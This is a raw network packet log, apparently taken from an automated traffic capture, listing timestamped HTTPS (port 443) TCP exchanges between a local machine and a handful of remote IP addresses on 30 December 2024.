                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.279177904 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.282740116 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.282820940 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.282825947 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.286158085 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.286217928 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.286222935 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.289547920 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.289630890 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.289644003 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.292999983 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.293073893 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.293078899 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.296555042 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.296627045 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.296632051 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.300112009 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.300194025 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.300199032 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.306759119 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.306871891 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.306876898 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.307667017 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.307686090 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.307835102 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308024883 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308053017 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308135986 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308419943 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308433056 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308578968 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.308588982 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.317120075 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.317179918 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.317184925 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.317954063 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.318028927 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.318032980 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.319014072 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.319051027 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.319070101 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.319075108 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.319125891 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.319129944 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.321022034 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.321118116 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.321122885 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.324444056 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.324537992 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.324542999 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.327461958 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.327510118 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.327516079 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.330506086 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.330544949 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.330552101 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.330557108 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.330610037 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.333607912 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.334400892 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.334423065 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.334496975 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.334860086 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.334892035 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.335035086 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.335112095 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.335134029 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.335279942 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.335290909 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.336639881 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.336684942 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.336705923 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.336713076 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.336807966 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.338763952 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.340884924 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.340924978 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.340939045 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.340945005 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.341036081 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.342808008 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344535112 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344556093 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344682932 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344870090 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344907045 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344949961 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.344955921 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.345004082 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.345622063 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.345635891 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.346937895 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.347155094 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.347223043 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.347328901 CET53879443192.168.2.9172.217.16.193
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.347341061 CET44353879172.217.16.193192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.760781050 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.761080980 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.761099100 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.761450052 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.762908936 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.763000965 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.787676096 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.787921906 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.787933111 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.788990974 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.789084911 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.789448023 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.789515018 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.790724993 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.792802095 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.792810917 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.793184042 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.797220945 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.797305107 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.815231085 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.816648960 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.816668987 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.817728043 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.817828894 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.819669008 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.819731951 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.840095043 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.840133905 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.840133905 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.840143919 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.905402899 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.905431032 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.905494928 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.907155037 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.907171965 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.949426889 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.949440956 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.949501038 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.993206978 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:36.993263006 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.029551029 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.029558897 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031430006 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031435966 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031526089 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031546116 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031552076 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031558037 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031712055 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.031738043 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.032001019 CET53891443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.032018900 CET44353891116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.056616068 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.423989058 CET44353881116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.424076080 CET44353881116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.424084902 CET53881443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.424118042 CET53881443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.426177979 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.428132057 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.428150892 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.428524017 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.428870916 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.428944111 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.430083990 CET53881443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.430104017 CET44353881116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.463295937 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.463351011 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.463449955 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.463699102 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.463715076 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.525425911 CET53900443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.525469065 CET44353900172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.525533915 CET53900443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527292013 CET53901443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527339935 CET44353901172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527487040 CET53901443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527795076 CET53900443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527812958 CET44353900172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527975082 CET53901443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.527990103 CET44353901172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.535707951 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.566040039 CET53900443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.566140890 CET53901443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573543072 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573607922 CET4435389823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573656082 CET53898443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573728085 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573805094 CET44353887172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573843956 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573875904 CET53887443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573921919 CET44353890172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.573971033 CET53890443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574049950 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574140072 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574187994 CET44353889172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574207067 CET44353888172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574255943 CET53889443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574321032 CET53888443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.574939013 CET53868443192.168.2.918.244.18.122
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.575016022 CET4435386818.244.18.122192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.575113058 CET53868443192.168.2.918.244.18.122
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.576366901 CET53902443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.576392889 CET44353902172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.576447964 CET53902443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.577028990 CET53903443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.577054024 CET44353903172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.577250957 CET53903443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.583214998 CET53903443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.583228111 CET44353903172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.583440065 CET53902443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.583455086 CET44353902172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.611331940 CET44353900172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.611339092 CET44353901172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.988956928 CET44353900172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:37.989012003 CET53900443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.007596970 CET44353901172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.007690907 CET53901443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.037120104 CET44353902172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.040013075 CET53902443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.040028095 CET44353902172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.041121960 CET44353902172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.041187048 CET53902443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.044328928 CET53902443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.044408083 CET44353902172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.045460939 CET44353903172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.046621084 CET53903443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.046629906 CET44353903172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.047660112 CET44353903172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.047720909 CET53903443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.048800945 CET53903443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.048857927 CET44353903172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.102627039 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.102699041 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.103847027 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.103856087 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.107698917 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.107706070 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108061075 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108081102 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108377934 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108396053 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108577967 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108606100 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108697891 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.108702898 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109158039 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109167099 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109390020 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109397888 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109425068 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109433889 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109453917 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109463930 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109482050 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109488964 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109505892 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109505892 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109517097 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109522104 CET44353899116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109544992 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109544992 CET53899443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:38.109554052 CET44353899116.203.14.4192.168.2.9
